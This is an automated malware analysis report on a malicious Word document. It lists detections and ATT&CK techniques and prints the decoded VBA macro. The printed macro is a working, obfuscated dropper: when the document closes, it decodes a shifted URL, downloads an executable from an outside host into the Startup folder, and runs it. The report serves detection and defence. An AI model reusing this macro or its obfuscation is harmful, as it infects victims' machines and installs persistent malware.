MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. Heuristics indicate the use of WScript.Shell and CreateObject, along with a critical finding of VBA downloading and executing a file via HTTP. The macro code appears to be obfuscated but the intent is to download and run a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Downloader.00536d-6923444-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6923444-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
EKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJP = CreateObject("WScript.Shell").Specialfolders(7) + NJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNP -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
JUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTV = XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set KRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIE = CreateObject("Shell.Application") -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4882 bytes |
SHA-256: facca2159711b1d55ca8411a1ec7d8991b3221bc38c6d6ff7c831e76c0c5375d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function LJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFO(YIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZM)
VKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSB = 10 - 9
DNDOXKXDBJBMEKMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMML = ""
For OGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHU = VKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSB To Len(YIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZM)
RVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJ = Asc(Mid(YIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZM, OGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHU, VKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSB))
LUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJPDNDOXKXDBJBMEKMLQYGKLPCYNOFI = RVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJ - VKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSB
DNDOXKXDBJBMEKMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMML = DNDOXKXDBJBMEKMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMML & Chr(LUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJPDNDOXKXDBJBMEKMLQYGKLPCYNOFI)
Next
LJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFO = DNDOXKXDBJBMEKMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMML
End Function
Private Sub Document_close()
Set KRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIE = CreateObject("Shell.Application")
Set XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY = CreateObject("microsoft.xmlhttp")
Set KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM = CreateObject("adodb.stream")
NJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNP = LJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFO("]SQKUQ/fyf")
RELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJPDNDOXKXDBJBME = LJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFO("iuuq;00xxx/wbdpnqboz/dp/{b0ijtupsz0vqebuf/fyf")
EKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJP = CreateObject("WScript.Shell").Specialfolders(7) + NJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNP
XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.Open "GET", RELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJPDNDOXKXDBJBME, False
XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.send
JUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTV = XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.responseBody
If XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.Status = 200 Then
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.Open
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.Type = 1
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.Write JUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTV
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.SaveToFile EKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJP, 2
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.Close
End If
KRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIE.Open (EKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJP)
End Sub
Attribute VB_Name = "NewMacros"
Sub BLUR()
'
' BLUR Macro
'
'
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.